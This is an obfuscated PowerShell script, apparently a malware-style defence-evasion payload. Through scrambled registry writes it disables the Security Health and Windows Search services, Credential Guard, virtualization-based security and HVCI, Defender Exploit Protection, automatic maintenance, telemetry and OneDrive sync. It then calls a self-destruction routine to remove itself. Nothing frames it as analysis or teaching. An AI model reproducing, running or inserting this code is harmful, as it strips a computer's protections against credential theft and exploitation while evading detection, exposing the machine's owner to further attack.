   &    (  'Set-R'   +    'egi'  +      'st'        +    'ryP'     +    'roper'    +  'ti'    +  'es'     ) -path (     (        (  (       'HKLM'  +   ':N'     )    +     't'    )     +   (  (    'gS'      +    'YST'       )     +      'E'  )     +     'MN'     +  't'   +   (     'g'     +   (        'Cur'  +      'r'     )  )   +   'e'      +    (    'nt' +  (  'Co'      +       'ntr'    + 'o'      ) +   'lS'     +   'e'     )  +  (   (     'tNtg'    +   'S'  )  +       'er'    +    'v'  )    +    'i'   +       ( (    'ce'    +   'sN'       )     +   'tg'     +      'Se'     )    +   (      (    'cu'      +    'r'       )  +   'i'    )       +       'ty'    +    (     'He'     +    (    'al'   +     'th'      )     )      +   'Se'    +       (    'rv'       +  'ic'     )  +   'e'    )-repLAcE(    'N'   +     'tg'     ),[chaR]92  ) -properties @{(   (    'St'     + 'a'     ) + 'rt'       )     =     4}

   &    (   'Set-'   +     'R'  +  'egi'    +    'stryPr'       +  'oper'    +   'tie'  +   's'      ) -path (     (    'HK'    +    'L'    +    (   'M'  +      ':s'   +    'ZE'      +    (  'SYS'   +       'T'     )  )      +  'EM'       +     's'    +       (     'Z'    +      'EC'     )     +     'u'     + 'r'       +     (    're'    +  'n'      +     (   't'     +    'Con'     )    )   +    (  't'     +     (     'ro'    +  'lS'   )     )     +     (     'et'    +   's'   +     (   'Z'     +     'ESer'        )   )  +      'vi'   +    'ce'     +      (    (       'ssZE'   +      'W'     )  +    'S'     +     'ea'   )  +        'r'     +     'ch'    )."Re`PLa`Ce"(      ( [char]115  +   [char]90     +   [char]69   ),'\'     )      ) -properties @{(     (       'St'    +  'a'     )  +    'rt'     )      =     4}

   &  (    'Se'   +  't'    +    '-Regi'    +    's'    +     'tryPro'     +      'perties'     ) -path (    (   (       'H'      +   (    'KL'     + 'M'    )    )     +     ':{0}SOFTWA'    +    'RE{0}'   +      'M'    +    (     (   'i'        +    'cr'     )+   'o'       )    +   (    's'   +     'of'   )    +       't{'    +      '0}W'   +      (       'i'     +   'nd' )    +      (      'ow'     +   's'    )     +       ' NT{0}CurrentVersio'   +     'n'   +    '{0}Schedul'    +   'e{0'   +  '}'  +      'M'  + 'a'    +  (  'i'  +  (   'n'   +      'ten'      )    )      +    'a'     +  'nc'  +    'e'    )-f[ChAR]92     ) -properties @{(     ('M'    +    (   'a'  +   'int'    )       )  +   'en'    +   (      (      'anc'    +    'e'   )    +    'D'   )     +   (   (    'i'+   'sa'    )    +    'bl'     )   +    'ed'      )       =    1}

   &      (     'Set-Regi' + 'stryPr'  +   'oper'   +     't'   +   'ies'   ) -path (      (    (   (   'H'   +     'KL'    +      'M:qI'  )     +     'cS'      +  'O'    )    +     (      (      'FT'  +     'WA'    )      +     'R' )      +      'E'    +      'qI'     +  (    (     'c'  +     'Polic'   )  +       (     'ie'  +       's'  )   )   +    'qI'    +    (     'c'      +    'Mi'    )     +      (     'c'  +    (   'ros'   +      'o'      )  )     +  (   (    'ftq'    +   'Ic'     )   +    'Wi'    +    'nd'    +    (       'o'   +     'ws'   )  )     +     (     'q'     +   'Ic'    )     +   'D'      +    (      (   'ev'    +    'i'    )    +   'c'     )    +      (       'e'      +   (    'Gu'     +   'a'     )     ) +        'rd' )-rEpLaCE(     [chAR]113     +      [chAR]73  +       [chAR]99     ),[chAR]92       ) -properties @{(    'Ls'   +    (     (   'a'   +    'Cfg'   )    +   'F'    )  +   (       'l'   +     (  'a' +     'gs'     )    ))   =   0}
  &   (   'Se'     +  't-Re'   +    'gist'      +   'ryProperti'   +    'es'  ) -path (    (   (     (    'H'    +    'KLM:'   )      +(     'QT'   +    'r'   )   )      +      (   'S'  +       (  'Y'  +   'STE'    )   )    +     (  'M'    +     'Q'     +   (    'TrC'      +   'u'  )     )     +    'r'      +     (   (   'r'    +      'en'    )      +    't'   +   ( 'Co'     +   'n'   +   'trol'    )    )    +     (   (    'S'   +       'etQ'       )+     'T'      )    +        (       'r'       +   'Co'      )   + (    'nt'  +    'r'     )      +   ( (    'o'   +       'lQ'   )       +   (      'T'    +    'rL'  )   +     'sa'    )   )."replA`CE"( (      [ChAR]81    +     [ChAR]84 +    [ChAR]114    ),'\'  )    ) -properties @{(   (     'Ls'     +     'a'    )    +    'C'      +     'fg'      +     (  'F'      + (    'lag'   +      's'     )       )    )       =     0}

    &    (    'S'    +     'et-R'    +    'eg'  +   'ist' +        'ryProper'   +    'ties'      ) -path (     (    (    (      'HKL'    +   'M'      ) +    ':'   )   +   '{0}SYSTEM{'   +     '0}Cur'   +       (       (   're'   +    'n'      ) +     'tC'    )   +  'ontrolSet{0}Cont'   +  'rol{'   +     '0}'      +     'D'       +  'ev'     +    'i'    +    (   'ce'  +     (   'Guar'     +   'd'     )  )   )-F  [chAr]92    ) -properties @{(    (  'En'    +     (       'able' +      'V'  )  +      'ir'    )     +     (       (   't'      +'ual'     )  +      'iz' +  'at'     )    +     'io'   +    (    'n'      +      'Ba'   )     +     (    'se' + 'dS'      )     +     (   (    'e' +     'cu'  )  +   'ri'     ) +  't'   +     'y'   )  =    0       ;      (     'Re'     +  (      'qu'    +  'i'     )    + (  (     're'    +    'Pl'     )    +    'a'    )    +    (     (     'tf'    +  'o'   )  +     'rm'   )       +  (     (      'Se'    +   'c'  )     +  'u'   )   +       'ri'       +'t'  +    'y'      +      (  'F'     +    (   'e'      +  'at'    )     +       (     'ur'   +    'e'      )     ) +  's'     )    =        0      ;    (      (  'HV'      +    'CI'      )    +     (   'MA'   +  (   'T' +     'Re'   )   )  +     (     'qu'   +      'i'       )    +    're'  +    'd'      )      =   0}

    &     (    'S'  +    'e'   +       't-'       +     'RegistryP'   +      'ropert'  +  'i'     +      'es'      ) -path (   (     (    'H'     +   'KL'    )   +   'M:{0}SO'     +  'FT'    +       'W'    +   'ARE{0'   +     '}Mic'   +    'ro'        +'soft{0}Hvs'    +    'i'   )-F  [char]92   ) -properties @{(      'E'   +       'n'     +   (  (     'abl'      +      'e'    )    +        'd'     )      )   =     0}

    &     (  'S'      +     'e'      +  't-Reg'      +    'istryPr'     +     'operties'    ) -path (  (   'HK'   +    (     'L'  +     'M:'   )      +  (      'X'+    (     'Jl'   +     'SO'   )    +    'FT'    )    +    (       'WA'    +      (     'RE'   +  'XJl'      )      +    'Po'       )  +     ( 'l'     +     'ic'   +   (      'iesX'      +    'J'     )   )     +      (     'l'    +     (     'Mi'    +   'c'    )   ) +   ( (    'roso'  +     'ft'     )  +    'X'  +      'J'  +      'lW'     )    +  (   'i'    +      (    'ndo'      +    'w'   )      + (      's'    +   ' D'      )      )     +   'ef'   +  'en'  +       (  'd'     +     'er'   )      +     (     'XJ'     +     'l'  +      (      'Wi'    +      'ndo'     )   )     +  'w'      +     (  (     's'      +     ' D'    ) +     'ef'    )   +    (     'e'   +      (  'n'+     'de'     )     )    +     (       'r'   +  ' E'     )    +     (   (   'xp'   +  'loi'    )     +     't '    )     +       (    'G'    +      (     'ua'     +   'rd'   )    )     )-cREplACE (   'X'   +    'Jl'   ),[chaR]92   ) -properties @{(    'En'     +      'ab'   +    'le'    +    'Ex'        +     (        'p'    +  (      'l' +   'oi'     )     )    +   't'    +    (   'P'        +  'r'  + (   'o'      +    'tectio'     +      'n'     )    ))  =  0}

        &     (      'S' +   'et-'      +      'Re'   +  'gis'    +      'tryPrope'  +     'rties'   ) -path (    (     (      'HK'   +    'L'    )      +     'M:'     +   '{0}SO' +  (     'FT'     +    (    'W'  + 'ARE'    )       )       +       '{'  +      '0}'     +      'Po'    +      'licies{'    +  '0}M'      + 'i'    +   (       'cr'     +  (   'os'  +       'of'    )     )    +      't'    +      '{'    +      '0'     +    '}Window'      +  's{0}Da'     +     (    'ta'       +   'Co'  +    (     'll'      +      'e'  )    )  +    'c'  +     (       'ti'      +   'on'      )    )  -F  [chaR]92      ) -properties @{(     'A'      +     (   'll'    +  (  'o'   +  'wT'    )   )    +     (      'e'     +     ( 'lem'     +     'e'   )    +   (     't'     +       'ry'   )     )    )   =    0}

    &    (   'S'  +   'et-Regis'   +  'tr'   +'y'      +    'P'     +   'r'      + 'operties'    ) -path ( (  'HK'    +    'L'    +     'M:{0}SOFTWARE{0}Po' +   (      (      'lic'    + 'i'       )    +    'e'    )    +     's{'     +    '0}'    +    (     (    'Mi'       +    'c'   )      +     'r'       +  (  'o'     +   'sof'   )    )   +   't'    +     '{' +     '0}'      +   'W'    +   'in'   +     'dows{'     +    '0'    +    '}OneDr'        +       (    'i'       +   've'     )      )  -f  [CHar]92  ) -properties @{(    (     (  'Dis'     +     'a'    )  +     'bl'   )     +    (       'e'   +  'Fi'   )  +      'le'   +    'S'    +      (   (   'y'       +    'nc'     )    + (   'N'     +   'GSC'    )     )    )     =     1}

    &      (   'Set-'    +   'Regist'       +     'ryP'  +     'roper'   +      'ties'   ) -path (     (    'H'   +  (    (     'KLM'     +      ':Eo'  )       +     'V'      )     +     'S'      +  (     (      'OF'     +    'T'       )  +    (   'WAREE'    +    'o'     + 'VP'    )   +       'o'     +   (     'lici'    +     'e'      )      +     's'      +   (  'E'     + 'oV'    )     )   +    'M'   +    (     'i'     +    'cr'  )       +    (       'o'      +    ( 'so'+  'f'    )   )    +      't'      +       (     (     'E'   +      'oV'    )    +  'W'     )        +    'i'   +    (    'n'     +  'do'   )       +   'ws'   + 'E'   +  (  'o'    +     (    'VWind'     +     'o'     +    'w'       )    )  +     's'       +      ' '      +   (     ('S'    +    'ea' )  +     'r'    )      +      'ch'    ).(       'rep'     +  'laCe'    )."In`VOke"(     (    'E'    +    'oV'   ),'\'   )  ) -properties @{(    (      'A'    +      (      'll'   +     'ow'   )  )   +     'C'     +      (    (  'o'     +   'rt'     )+  'an'   + 'a'    )   )     = 0}

  &   (    'I'  +  'nv'   +     'o'       +     'ke-'   +    'Se'    +  'l'   +      'fDestruction'   )